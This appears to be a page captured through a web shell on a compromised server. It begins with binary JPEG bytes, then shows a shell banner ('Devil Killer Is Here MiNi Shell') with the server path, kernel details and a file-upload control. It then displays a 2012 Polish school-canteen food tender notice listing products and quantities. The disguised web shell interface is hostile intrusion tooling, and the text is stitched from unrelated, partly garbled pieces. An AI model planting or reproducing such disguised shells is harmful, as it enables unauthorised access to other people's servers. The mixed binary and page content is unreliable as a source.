JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120731/279092-N-2012.html

<p class="kh_header"><b>Tomaszów Lubelski: Dostawa artykułów spożywczych do stołówki szkolnej przy Internacie Zespołu Szkół Nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5</b><br>
<b>Numer ogłoszenia: 279092 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr3.tk</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki szkolnej przy Internacie Zespołu Szkół Nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa artykułów spożywczych do stołówki szkolnej przy internacie Zespołu Szkół nr 3 w Tomaszowie Lubelskim przy ul. Hallera 5.
Przedmiot zamówienia został podzielony na 13 CZĘŚCI od nr I do XIII .
Wspólny słownik kodów CPV: 15000000-8
CZĘŚĆ   I  	PIECZYWO		Kod CPV 15612500-6	
CZĘŚĆ  II 	MLEKO I JEGO PRZETWORY kod CPV 15500000-3	
CZĘŚĆ  III 	MIĘSO JADALNE  I  wyroby wędliniarskie Kod CPV 15100000-9,15131120-2
CZĘŚĆ  IV  	RÓŻNE PRODUKTY SPOZYWCZE	Kod CPV 15800000-6
CZĘŚĆ  V 	RYBY PRZETWORZONE I KONSERWOWANE	Kod CPV 15200000-0
CZĘŚĆ  VI 	DRÓB				Kod CPV 15112000- 6
CZĘŚĆ  VII 	MROŻONKI 			Kod CPV 15331100-8
CZĘŚĆ  VIII 	OWOCE  ŚWIEŻE		Kod CPV  03121000-5
CZĘŚĆ  IX 	WARZYWA 			Kod CPV 15300000-1 
CZĘŚĆ  X 	JAJA  KURZE			Kod CPV 03142500-3
CZĘŚĆ  XI 	PRODUKTY MĄCZNE  GOTOWE	Kod CPV 15851000-8
CZĘŚĆ  XII 	MAKARONY			Kod CPV 15850000-1
CZĘŚC  XIII    ZIEMNIAKI 			Kod CPV 03212100-1

Szczegółowy opis każdej części zawierają  Arkusze kalkulacyjne oferty jako wykazy asortymentowo - ilościowe na poszczególne części , które stanowią  załączniki niniejszej specyfikacji  istotnych warunków zamówienia  od nr 2.1. do 2.13. 
W przypadku towarów posiadających nazwy towarowe ma zastosowanie zapis lub  równoważny zgodnie z art. 29 ust. 3 Pzp w przypadku, gdy przedmiotu zamówienia nie można opisać za pomocą dostatecznie dokładnych określeń. Zamawiający może w opisie przedmiotu zamówienia zastosować znaki towarowe wraz z zapisem lub równoważne.
Artykuły spożywcze mają być wysokiej jakości pod względem właściwości organoleptycznych wygląd, smak, zapach i odżywczych oraz posiadać maksymalny okres przydatności do spożycia przewidziany dla danego artykułu.
Produkty spożywcze muszą być dostarczane w opakowaniach jednostkowych opisanych w arkuszach kalkulacyjnych w opakowaniach o gramaturze, nie mniejszej niż opisana przez Zamawiającego. Zamawiający nie dopuszcza dostaw luzem w opakowaniach zbiorczych. Artykuły muszą być dostarczone w oryginalnych opakowaniach producenta, które muszą mieć określoną metkę zawierającą informację o produkcie, jego skład i datę ważności.
Zamawiający zastrzega sobie prawo zmian ilościowych poszczególnych towarów w ramach maksymalnej kwoty określonej na realizację zadań. Podane ilości przedmiotu zamówienia są wielkościami szacunkowymi , w związku z powyższym mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego w okresie obowiązywania umowy.
Ustalenia organizacyjne związane z wykonaniem zamówienia:
Dostawy będą realizowane na zasadzie sukcesywnych dostaw artykułów spożywczych  do stołówki szkolnej przy internacie Zespołu Szkół Nr 3 , w oparciu o bieżące potrzeby Zamawiającego na  podstawie szczegółowego zamówienia złożonego  telefonicznie lub faxem przez Zamawiającego z dziennym wyprzedzeniem. Wykonawca zobowiązany jest rozładować towar w miejscu wskazanym przez Zamawiającego.
Dostawy artykułów spożywczych  do stołówki szkolnej przy internacie Zespołu Szkół Nr 3 w Tomaszowie Lub. zapewnia Wykonawca, ponosząc koszty i ryzyko transportu. 
Wykonawca zobowiązuje się dostarczyć towar środkiem transportu, którego warunki techniczne oraz stan sanitarny zgodne są z normami sanitarnymi obowiązującymi dla tego rodzaju transportu.
Zamawiający zapewnia sprawdzenie jakości oraz zgodności dostarczonego asortymentu i jego ilości ze złożonym zamówieniem bezpośrednio przy odbiorze.Potwierdzeniem odbioru ilościowego będzie podpisanie dokumentu dostawy.
W przypadku późniejszego (np: po otwarciu opakowań) zakwestionowanie asortymentu Zamawiający telefonicznie zgłosi Wykonawca konieczność wymiany towarów. 
Wykonawca wymieni zakwestionowany asortyment na koszt własny w ciągu 12 godzin.
Zamawiający nie odpowiada za straty poniesione przez Wykonawcę z tytułu zwrotu kwestionowanej partii towaru.
Wykonawca może złożyć ofertę na jedną lub więcej części ( rodzajów części ) .
Każda część oceniana będzie odrębnie.
Zamawiający nie dopuszcza składania ofert częściowych w obrąbie danej części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.25.00-6, 15.50.00.00-3, 15.10.00.00-9, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 03.12.10.00-5, 15.30.00.00-1, 03.14.25.00-3, 15.85.10.00-8, 03.21.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny przy składaniu oferty.Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń (pkt.6 SIWZ) potwierdzających spełnianie warunków udziału w postępowaniu według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny przy składaniu oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny przy składaniu oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny przy składaniu oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny przy składaniu oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.2. Zamawiający przewiduje możliwość zmian postanowień umowy (art.144 ust.1 ustawy Prawo zamówień publicznych) i określa warunki tej zmiany w zakresie:
1)	nazwy, adresu oraz osób reprezentujących strony, 
2)	zmiany stawek VAT na artykuły wymienione w załączniku do umowy, przy czym zmianie ulegnie wyłącznie cena brutto wynikającej ze wzrostu urzędowej stawki podatku VAT , cena netto pozostanie bez zmian. Zmiany te następują z mocy prawa i obowiązują od dnia obowiązywania odpowiednich przepisów. 
3)	każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego, jednak Zamawiający nie dopuszcza zmiany ceny netto na wyższą od oferowanej.
4)terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsnr3.tk/index.php?option=com_content&view=category&id=21&Itemid=20<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 3 w Tomaszowie Lubelskim , ul. Hallera 5 , 22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 12:00, miejsce: Zespół Szkół Nr 3 w Tomaszowie Lubelskim , ul. Hallera 5 , 22-600 Tomaszów Lubelski 
sekretariat szkoły pokój nr 40 , parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb  zwykły  krojony    waga nie mniej jak 500g 	szt.	15000
2	Chleb razowy mieszany waga nie mniej jak 500g	szt.	1000
3	Bułka zwykła waga nie mniej jak  50 g	Szt.	14500
4	Bułka tarta 	kg	    200
5	Placek  cebularz 100 g	szt.	1400
6	Drożdżówka 100 g	szt.	1000
7	Rogal  100 g       	szt.	1500
8	Krokiet /pasztecik / waga nie mniej jak 120 g 	szt.	500
9	Pączek  waga nie mniej jak   60 g	szt.	350
10	Makowiec  500 g	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko spożywcze  zaw.2%  tł. w opak. 1 l.litr	4500
2	Śmietana zaw. 18 % tł.   litr	450 
3	Śmietana Kubek  op.450 ml zaw.18%  tł.	szt.	 150
3	Masło ex .zawartość tł. 82,5%   op. 0.200 g	kg 	180 
4	Twaróg półtłusty 	Kg.	 450 
5	Ser topiony  100 g	Szt.	2500 
6	Ser  zółty  tłusty SALAMIX 	kg.	100 
7	Ser żółty półtłusty EDAMSKI 	kg	150
8	Jogurt  kubek  op. 150 ml. 	Szt.	2000 
9	Serek homogenizowany  smakowy  op.125 g	Szt.	1000 
10	Serek wiejski Bieluch lub inny równoważny op.nie mniej jak125 g	szt 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> - MIĘSO  i  WYROBY WĘDLINIRSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mięso mielone wieprzowo-wołowe 	kg.	550
2	Mięso  wieprzowe gulaszowe  II  kl.	kg.	400 
3	Karkówka wieprzowa  z kością 	kg.	150 
4	Karkówka wieprzowa b/k 	kg	70
5	Schab  wieprzowy z kością 	kg.	450
6	Schab wieprzowy b/k	kg	100
7	Wątroba wieprzowa	kg.	60 
8	Żeberka  wieprzowe(Paski) 	kg.	150 
9	Smalec wieprzowy 	kg	10
10	Boczek wędzony parzony	kg.	50 
11	Baleron 	kg.	75 
12	Kiełbasa krakowska 	kg.	250
13	Mielonka  wieprzowa Smaczek 	kg.	100
14	Kiełbasa zwyczajna	kg.	80 
15	Kiełbasa łopatkowa	kg.	100 
16	Kiełbasa wiejska 	kg.	190
17	Kiełbasa szynkowa z kminkiem 	kg	320
18	Pieczeń chlebowa 	Kg 	150
19	Polędwica sopocka 	Kg 	300
20	Ogonówka 	kg	400
21	Paróweczki delikatesowe	kg.	120
22	Szynka parzona 	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cukier biały kryształ- paczkowany  op.1kg	1300	Kg
2.Chrzan  tarty w słoiku op.  Nie mniej jak  160 g	80	Szt
3.Kakao ciemne holenderskie  sypkie  op. Nie mniej jak 100g  80 Szt
4.Dżem wiśniowy op.  nie mniej jak 280g	200	Szt
5.Dżem  truskawkowy , op. nie mniej jak  280 g	500	Szt
6.Dżem  śliwkowy - nie mniej jak 280g	500	Szt
7.Fasolka konserwowa czerwona op.nie mniejsze jak 400g 35	szt
8.Fasolka konserwowa biała op. 400 g	35	Szt
9.Groszek konserwowy  op. nie mniej jak  400 g  	160	Szt
10.Gałka muszkatołowa mielona 20 g	10	Szt
11.Herbata granulowana 100 g 	150	Szt
12.Herbata  ekspresowa  op. zaw. 100 saszetek 	10	Op
13.Kawa inka  op. nie mniejsze jak 150 g	65	Szt
14.Keczup PIKANTNY  op. nie mniej jak  500 g 250	Szt
15.Koncentrat pomidorowy 30 % op. Nie mniej jak 200g 230	Szt
16.Kukurydza konserwowa słodka  -op. nie mniejsze jak 400 g 	180	Szt
17.Kwasek cytrynowy  op. Nie mniej jak 20g	95	Szt
18.Majonez  dekoracyjny nie mniej  jak 700 g  Firmy Winiary
lub inny równoważny	145	Szt
19.Musztarda  delikatesowa  op. nie mniej 180g	160	Szt
20.Majeranek  torebka  op. 20g	90	Szt
21.Miód naturalny wielokwiatowy op. słoik  1300 kg	10	Szt
22.Ocet  spirytusowy 10 %  op. 05 l. 	15	Szt
23.Przyprawa do zup w płynie  op. - 1 l  Firmy Winiar lub inny  równoważny 	120	Szt
24.Pieprz naturalny czarny mielony Op. nie mniej jak 20g 300	Szt
25.Pieprz ziołowy torebka  op. 20 g	70	Szt
26.Papryka w proszku słodka mielona Op. nie mniej jak 20 g 200	Szt
27.Pietruszka susz-  natka op nie mniej jak 20g 	190	Szt
28.Koper susz nać  op. nie mniej jak 20 g	130	Szt
29.Przyprawa do potraw typu Vegeta lub inny równoważny op.200 g 180	Szt
30.Ryż biały  op. 1 kg	160	Kg
31.Rosołki drobiowe /op. 180 g Firmy Winiar lub inny równoważny	220	Op
32.Sól kuchenna  spożywcza 	160	Kg
33.Ziele angielskie torebka 15g	25	Szt
34.Liść laurowy  torebka 15 g	20	Szt
35.Mąka ziemniaczana  op. 1000 g	30	Kg
36.Mąka pszenna  luksusowa  typ 550  	390	Kg
37.Olej jadalny uniwersalny  op. 1 litr	450	Szt
38.Margaryna  śniadaniowa z zaw. Olejów roślinnych op. 500 g	1100	Szt
39.kasza jęczmienna  wiejska op.1000g	50	Kg
40.Kasza gryczana  op. 1000 g	120	Kg
41.Płatki kukurydziane  zwykłe op. Nie mniej jak 425 g	120	Szt.
42.Ogórek konserwowy  poj. 0.9 l	260	Szt
43.Papryka konserwowa poj. 0,9 l 	200	Szt
44.Serek top. Krążki  op. 140 g	800	szt
45.Serek top. plastry op. 150g	1000	Szt
46.Konserwa turystyczna  nie mniej jak  op. 135g	1500	Szt
47.Pasztet drobiowy nie mniej jak op.135g 	1500	Szt
48.Delikat do mięs op. 700 g  	15	Szt 
49.Delikat do ryb op. 700g	 3	Szt
50.Delikat do drobiu op. 700 g	13	Szt
51.Sos sałatkowy ogrodowy op.700 g	18	Szt
52.Baton Snikers lub inny równoważny op. nie mniejsze jak 50 g	1000	Szt
53.Ciastka delicje op. nie mniej jak 140 g	360	Op
54.Ciastka  pierniczki luz 	20	Kg 
55.Cukierki czekoladowe   Wedell luz lub inny równoważny 20	Kg
58.Czekolada  wedell   lub inny równoważny  op. 100 g	800	Szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Filet z ryby mrożony morszczuk SHP	Kg 	180
2.Filet śledziowy  b/skóry w oleju 	kg	120
3.Makrela wędzona na ciepło	Kg	80
4.Konserwa rybna szprot w oleju  op. nie mniej jak   170 g	Szt	230
5.Konserwa rybna szprot w pomidorach op. nie mniej jak 170 g	Szt	400
6.Paprykarz szczeciński op. 300 g 	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Filet drobiowy  mrożony Kg	350 
2.Porcje rosołowe Kg	180
3.Mięso drobiowo - gulaszowe 	Kg	180
4.Ćwiartka z kurczaka  mrożona 	Kg	750.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Mieszanka mrożona Wielo- warzywna 7 składnikowa Op.2,5 kg Op	50 
2.Kalafior mrożony Op. 2.50 kg	Op.	15 
3.Szpinak mrożony op. 2,5kg	op	40
4.Pyzy ziemniaczane mrożone op. Nie mniej jak 500g	 op	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
